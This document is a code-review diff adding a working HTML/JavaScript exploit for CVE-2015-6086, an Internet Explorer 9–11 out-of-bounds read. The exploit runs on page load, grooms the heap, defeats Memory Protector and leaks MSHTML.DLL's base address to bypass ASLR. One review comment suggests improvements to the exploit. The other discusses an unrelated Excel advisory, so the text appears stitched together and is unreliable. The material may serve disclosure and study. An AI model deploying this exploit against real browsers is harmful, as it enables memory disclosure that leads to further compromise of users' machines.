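Review bot: the Report Timeline lines read `report the vulnerability` and `confirm the vulnerability`; they should be past tense (`reported`, `confirmed`) like the two lines that follow them. In Technical details, `exploited the vulnerabilities` should be singular, since the advisory covers one CVE (CVE-2016-0122). That section otherwise restates only the generic bulletin wording and gives no detail of the out-of-bounds read itself (which parser or record type triggers it, or the crash context), which is what a reader triaging exposure on Excel 2007 to 2016 would need; one sentence on where the read occurs would make the advisory useful beyond the bulletin. The PoC is supplied only as an `.xlsm` download, so the advisory should state plainly that the file triggers the bug on unpatched builds and that the remedy is the MS16-042 update already named in the header.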


@ -0,0 +1,264 @@
<!--
CVE-2015-6086
Out Of Bound Read Vulnerability
Address Space Layout Randomization (ASLR) Bypass
Improper handling of new line and white space character caused
Out of Bound Read in CDOMStringDataList::InitFromString. This
flaw can be used to leak the base address of MSHTML.DLL and
effectively bypass Address Space Layout Randomization.
Affected Version:
Internet Explorer 9
Internet Explorer 10
Internet Explorer 11
Test Bed:
IE: 10 & 11
KB: KB3087038
OS: Windows 7 SP1 x86
Advisory:
http://www.payatu.com/advisory-ie_cdomstringdatalist/
https://technet.microsoft.com/library/security/MS15-112
http://www.zerodayinitiative.com/advisories/ZDI-15-547/
Copyright 2016 © Payatu Technologies Pvt. Ltd.
Author: Ashfaq Ansari
Email: ashfaq[at]payatu[dot]com
Websites: www.payatu.com
www.nullcon.net
www.hardwear.io
www.null.co.in
This program is free software: you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation, either version 3 of the License, or (at your
option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
this program. If not, see <http://www.gnu.org/licenses/>.
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
-->
<!DOCTYPE html>
<html>
<head>
<title>IE 10-11 Windows 7 SP1 x86 - OOB Read ALSR Bypass PoC</title>
<meta http-equiv="pragma" content="no-cache"/>
<meta http-equiv="expires" content="0"/>
<script type="text/javascript">
/**
* This function is used to create string of desired size.
*
* @param character
* @param size
* @returns {string}
*/
function createString(character, size) {
while (character.length < size) {
character += character;
}
// BSTR structure
// header | unicode string | NULL terminator
// 4 bytes | sizeof(string) * 2 | 2 bytes
return character.substr(0, (size - 6) / 2);
}
/**
* This function is used to get the Internet Explorer's version.
*
* @link http://stackoverflow.com/questions/19999388/jquery-check-if-user-is-using-ie
* @returns {int | null}
*/
function getInternetExplorerVersion() {
var userAgent = window.navigator.userAgent;
var msie = userAgent.indexOf('MSIE');
if (msie > 0) {
return parseInt(userAgent.substring(msie + 5, userAgent.indexOf('.', msie)), 10);
}
var trident = userAgent.indexOf('Trident/');
if (trident > 0) {
var rv = userAgent.indexOf('rv:');
return parseInt(userAgent.substring(rv + 3, userAgent.indexOf('.', rv)), 10);
}
var edge = userAgent.indexOf('Edge/');
if (edge > 0) {
return parseInt(userAgent.substring(edge + 5, userAgent.indexOf('.', edge)), 10);
}
return null;
}
/**
* This function is used to leak the base address of MSHTML.DLL.
*
* @param offsetOfMSHTMLBaseAddress
*/
function LeakMSHTMLBaseAddress(offsetOfMSHTMLBaseAddress) {
// Step 1: Let's do some clean up
CollectGarbage();
var eventArray = new Array();
var polyLineArray = new Array();
var exploitSuccessful = false;
// Step 2: As the target object is stored in Process Heap
// instead of Isolated Heap, we can use any element that
// is stored on Process Heap to spray the Heap.
//
// To create a predictable pattern on Heap, we spray using
// "MsGestureEvent" and it's size is 0x0A0. We will use
// this object to read the VFTable pointer.
for (var i = 0; i < 0x1000; i++) {
eventArray[i] = document.createEvent('MsGestureEvent');
}
// Step 3: Now we need to create a hole in the allocation
// that we made earlier. The purpose of this hole is to
// allocate the vulnerable buffer just before the Heap
// chunk of "MsGestureEvent"
for (i = 1; i < 0x500; i += 2) {
eventArray[i] = null;
}
// Step 4: As Memory Protector is enabled by default on all
// versions of IE, it will not allow the free of objects
// instantly. So, we need to force free the memory due to
// Delayed Frees.
CollectGarbage2();
// Step 5: Now, fill the hole that we created earlier. The
// "requiredFeatures" property is allocated on OLEAUT32 Cache
// Heap, old Plunger technique does not seems to work for me.
// I have used a neat trick to bypass OLEAUT32 Cache Heap.
for (i = 0; i < 0x250; i++) {
polyLineArray[i] = document.createElementNS('http://www.w3.org/2000/svg', 'polyline');
// Step 6: Trick to bypass allocation on OLEAUT32 Cached Heap
polyLineArray[i].setAttributeNS(null, 'attrib' + i, createString('A', 0x0A0));
// Step 7: Now, "requiredFeatures" property won't be allocated on OLEAUT32 Cache Heap.
polyLineArray[i].setAttributeNS(null, 'requiredFeatures', createString('\n', 0x0A0));
// Step 8: As the whole exploitation depends on certain Heap
// layout, thus, this is unreliable. But to overcome this
// un-reliability, I'm reloading the page until, right Heap
// Layout is achieved.
//
// This PoC is created for the vendor to acknowledge this bug,
// hence reliability is not my concern at this moment. We can
// make it more reliable, but let's leave it for later stage.
//
// Some heuristics to detect if Heap is in the right state.
// Once we have determined the Heap state, we can apply some
// more heuristics.
if (polyLineArray[i].requiredFeatures.numberOfItems == 2 && polyLineArray[i].requiredFeatures.getItem(1).length == 4) {
// Step 9: Read the Out of Bound memory
var OOBReadMemory = escape(polyLineArray[i].requiredFeatures.getItem(1));
// Step 10: Some more heuristics
var spitValue = OOBReadMemory.split('%');
var CDOMMSGestureEvent_VFTablePointer = parseInt('0x' + spitValue[3].replace('u', '') + spitValue[2].replace('u', ''));
var MSHTMLBaseAddress = CDOMMSGestureEvent_VFTablePointer - offsetOfMSHTMLBaseAddress;
// Step 11: Show the message to user
var message = 'MSHTML.DLL Base Address: 0x' + MSHTMLBaseAddress.toString(16);
message += '\n';
message += 'CDOMMSGestureEvent VFTable Pointer: 0x' + CDOMMSGestureEvent_VFTablePointer.toString(16);
alert(message);
// Step 12: Exploit successful
exploitSuccessful = true;
break;
}
}
// Step 13: As stated earlier, this is a bit unreliable.
// If the exploit has failed, reload the current page.
// If reloading does not help, close the browser and
// launch the exploit multiple times.
if (!exploitSuccessful) {
window.location.reload();
}
}
/**
* This function is used fill the wait list of the freed objects
* and trigger Garbage Collection.
*/
function CollectGarbage2() {
// Microsoft implemented Memory Protector to mitigate
// Use after Free vulnerabilities. The object protected
// by Memory Protector won't be freed directly. Instead,
// it will be put into a wait list which will be freed
// when it reaches certain threshold (i.e 100,000 bytes).
var video = new Array();
// Now allocate video element (400 bytes) 250 times
//
// Note: We are not using stack to store the references.
// If we use stack to store the references, the memory
// will never be freed during Mark and Reclaim operation
for (var i = 0; i < 250; i++) {
video[i] = document.createElement('video');
}
// Now free the elements. It will be put into the wait list.
video = null;
// Reclaim the memory by triggering Garbage Collection
CollectGarbage();
}
/**
* This function is used to launch the exploitation by leaking
* the base address of MSHTML.DLL.
*/
function LaunchExploit() {
var browserSupported = false;
var ieVersion = getInternetExplorerVersion();
var offsetOfMSHTMLBaseAddress = null;
if (ieVersion == 11) {
// If you are getting a wrong base address, please update this value
// offsetOfMSHTMLBaseAddress = VFTableAddress - MSHTMLBaseAddress
offsetOfMSHTMLBaseAddress = 0x0002ebe8;
browserSupported = true;
} else if (ieVersion == 10) {
// If you are getting a wrong base address, please update this value
// offsetOfMSHTMLBaseAddress = VFTableAddress - MSHTMLBaseAddress
offsetOfMSHTMLBaseAddress = 0x0000d270;
browserSupported = true;
} else {
alert('Current browser is not supported!\nExploit Tested on IE10 & 11 (Windows 7 SP1 x86)');
}
// Launch the exploit
if (browserSupported) {
LeakMSHTMLBaseAddress(offsetOfMSHTMLBaseAddress);
}
}
</script>
</head>
<body onload='LaunchExploit();'>
</body>
</html>
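Review bot: the page title reads `OOB Read ALSR Bypass PoC`; `ALSR` should be `ASLR`, matching the header comment. In `LeakMSHTMLBaseAddress`, the Step 10 variable `spitValue` is evidently meant to be `splitValue`, and the comment `Some more heuristics` does not describe what the code does (it reassembles the leaked VFTable pointer from two `%uXXXX` groups of the escaped string); a comment saying that would be clearer. Comment typos: `old Plunger technique does not seems to work` (`does not seem`) and `This function is used fill the wait list` (`used to fill`). The failure path in Step 13 calls `window.location.reload()` unconditionally, so on a patched build (MS15-112 is referenced in the header) where the Step 8 heuristic never matches, the page reloads forever; a bounded retry count that reports `not vulnerable` after N attempts would make the PoC usable as a regression check for the fix. Finally, the two offsets `0x0002ebe8` and `0x0000d270` are specific to the stated test bed (`KB3087038`, Windows 7 SP1 x86); the comments say to update them if the result is wrong, but the exact `MSHTML.DLL` build each value was taken from should be recorded next to it.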